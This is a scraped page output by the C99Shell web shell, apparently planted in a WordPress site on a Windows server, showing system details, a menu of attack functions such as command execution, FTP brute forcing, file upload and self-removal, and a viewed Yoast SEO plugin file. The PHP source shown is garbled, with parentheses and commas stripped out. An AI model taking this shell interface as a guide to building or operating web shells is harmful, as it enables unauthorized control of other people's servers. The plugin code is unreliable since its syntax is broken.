!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbreclima\wp-content\plugins\wordpress-seo\admin\views\   drwxrwxrwx
Free 4.13 GB of 39.52 GB (10.44%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     user-profile.php (1.7 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * @package WPSEO\Admin
 */

?>

<h3 id="wordpress-seo"><?php _e'WordPress SEO settings''wordpress-seo' ); ?></h3>
<table class="form-table">
    <tr>
        <th>
            <label
                for="wpseo_author_title"><?php _e'Title to use for Author page''wordpress-seo' ); ?></label>
        </th>
        <td><input class="regular-text" type="text" id="wpseo_author_title" name="wpseo_author_title"
                   value="<?php echo esc_attrget_the_author_meta'wpseo_title'$user->ID ) ); ?>"/>
        </td>
    </tr>
    <tr>
        <th>
            <label
                for="wpseo_author_metadesc"><?php _e'Meta description to use for Author page''wordpress-seo' ); ?></label>
        </th>
        <td>
                        <textarea rows="3" cols="30" id="wpseo_author_metadesc"
                                  name="wpseo_author_metadesc"><?php echo esc_textareaget_the_author_meta'wpseo_metadesc'$user->ID ) ); ?></textarea>
        </td>
    </tr>
    <?php if ( $options['usemetakeywords'] === true ) { ?>
        <tr>
            <th>
                <label
                    for="wpseo_author_metakey"><?php _e'Meta keywords to use for Author page''wordpress-seo' ); ?></label>
            </th>
            <td>
                <input class="regular-text" type="text" id="wpseo_author_metakey"
                       name="wpseo_author_metakey"
                       value="<?php echo esc_attrget_the_author_meta'wpseo_metakey'$user->ID ) ); ?>"/>
            </td>
        </tr>
    <?php ?>
    <tr>
        <th>
            <label
                for="wpseo_author_exclude"><?php _e'Exclude user from Author-sitemap''wordpress-seo' ); ?></label>
        </th>
        <td>
            <input class="checkbox double" type="checkbox" id="wpseo_author_exclude"
                   name="wpseo_author_exclude"
                   value="on" <?php echo ( get_the_author_meta'wpseo_excludeauthorsitemap'$user->ID ) == 'on' ) ? 'checked' ''?> />
        </td>
    </tr>
</table>
<br/><br/>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--